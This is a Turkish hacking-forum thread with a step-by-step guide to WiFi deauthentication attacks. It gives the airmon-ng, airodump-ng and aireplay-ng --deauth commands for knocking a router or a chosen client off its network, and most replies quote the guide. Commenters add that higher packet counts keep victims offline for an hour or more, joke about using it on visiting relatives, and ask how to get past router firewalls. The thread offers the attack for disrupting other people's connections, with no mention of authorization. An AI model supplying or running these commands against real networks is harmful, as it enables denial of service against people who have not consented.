Deauth Attack Nasıl yapılır? [ANLATIM]

rufiqcavadov

Katılımcı Üye
21 Eyl 2019
916
139
Herşeyi çok açık ev net yazmışsın gerçekten. Ellerine sağlık. Fakat kafamı karıştıran birşey oldu. Paket sayısı yazdığın alandaki 250 numara sayı tam olarak nerden geliyor onu anlamadım?

Suppressor

Request Uzmanı
16 Kas 2022
1,206
718
always, everywhere
Herşeyi çok açık ve net yazmışsın gerçekten. Ellerine sağlık. Fakat kafamı karıştıran birşey oldu. Paket sayısı yazdığın alandaki 250 numara sayı tam olarak nerden geliyor onu anlamadım?
Yani şöyle ben ss alıcaktım garanti olsun diye 250 attım paket sayısı ne kadar yükselirse karşı taraf o kadar daha fazla internnetn düşer 20000 yaparsan 1 saat belki daha fazla internette yok o kişi veya modem 10 15 yaparsan internetten düşer ama düştüğünü anlamaz

rufiqcavadov

Katılımcı Üye
21 Eyl 2019
916
139
Yani şöyle ben ss alıcaktım garanti olsun diye 250 attım paket sayısı ne kadar yükselirse karşı taraf o kadar daha fazla internnetn düşer 20000 yaparsan 1 saat belki daha fazla internette yok o kişi veya modem 10 15 yaparsan internetten düşer ama düştüğünü anlamaz
Yani oraya girdiğin 250 saniye mi?

TurkGokay

Uzman üye
4 Ara 2022
1,020
544
Kemalizm
Selamlar Bu Gün Deauth (deauthenticatin Attack Nasıl yapılır onu Anlatacağım.

Deauth Attack Nedir: Herhangi bir kablosuz ağda bağlı bulunan cihazları ağdan bağlantısını kesmeye yarayan bir saldırı çeşididir. Bu saldırıyı yapabilmek için hedef ağın MAC adresini bilmek gereklidir. İster hedeflediği kullanıcıyı isterse ağda bulunan tüm kullanıcıları ağdan koparabilir.

Ama ondan Önce bu saldırı gerçekleştirebilmemiz için 1 Adet Monitör Mod destekleyen usb Wifi karta ihtiyacımız var.
Benim kullandımğımm usb wifi kart

cqq0dxv.png
Takıyoruz ve Kali den seçiyoruz.

airmon-ng start wlan0
tsyam0h.png

Ardından airodump-ng wlan0mon

t1tza4s.png

Şimdi Seçtiğimiz ağ üzerinden detaylı bilgi almak için airodump-ng --channel 1 --bssid 5C:63:BF:00:D9:F2 ( Siz seçtiğiniz hedefin Channel ve Mac adresini gireceksiniz )

n2ymq3i.png

Burada Modeme Saldırmak istiyorsak aireplay-ng --deauth (paket sayısı ) -a (Modem Mac Adresi ) wlan0mon
289s6d5.png

Modema Bağlanan birine saldırmak istiyorsak aireplay-ng --deauth -a ( Modem Mac Adresi ) -c ( Modeme Bağlanan Kişinin Mac Adresi )
jr63ijx.png

Başarılı
321f9ih.png
Ellerinize sağlık çok güzel bir konu... Kuzenlerim geldiğinde kullanabileceğim yararlı bir şey. ;)

Nemesa

Katılımcı Üye
15 Şub 2023
285
133
System32.exe/nemesaxploit

Deauth Attack Nedir: Herhangi bir kablosuz ağda bağlı bulunan cihazları ağdan bağlantısını kesmeye yarayan bir saldırı çeşididir. Bu saldırıyı yapabilmek için hedef ağın MAC adresini bilmek gereklidir. İster hedeflediği kullanıcıyı isterse ağda bulunan tüm kullanıcıları ağdan koparabilir.

Ama ondan Önce bu saldırı gerçekleştirebilmemiz için 1 Adet Monitör Mod destekleyen usb Wifi karta ihtiyacımız var.

cqq0dxv.png

airmon-ng start wlan0
tsyam0h.png

t1tza4s.png

Şimdi Seçtiğimiz ağ üzerinden detaylı bilgi almak için airodump-ng --channel 1 --bssid 5C:63:BF:00:D9:F2 ( Siz seçtiğiniz hedefin Channel ve Mac adresini gireceksiniz )

n2ymq3i.png

Burada Modeme Saldırmak istiyorsak aireplay-ng --deauth (paket sayısı ) -a (Modem Mac Adresi ) wlan0mon
289s6d5.png

Modema Bağlanan birine saldırmak istiyorsak aireplay-ng --deauth -a ( Modem Mac Adresi ) -c ( Modeme Bağlanan Kişinin Mac Adresi )
jr63ijx.png

Başarılı
321f9ih.png
sagol bende bunu arıyordum

'Mergen

Hunter
27 Kas 2022
269
200
Elinize sağlık, bazı modemlerde DDOS koruma veya güvenlik duvarından dolayı bu işlemin işe yaramadığı durumlar olduğunu tecrübe ettim. Modemin güvenlik duvarını atlatmak için yapılan bir işlem var mıdır ?

Suppressor

Request Uzmanı
16 Kas 2022
1,206
718
always, everywhere

Butcherb3y

Uzman üye
1 Eyl 2022
1,617
1,199
Anıtkabir

cqq0dxv.png

airmon-ng start wlan0
tsyam0h.png

t1tza4s.png

n2ymq3i.png

289s6d5.png

jr63ijx.png

Başarılı
321f9ih.png
Elinize emeğinize sağlık

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.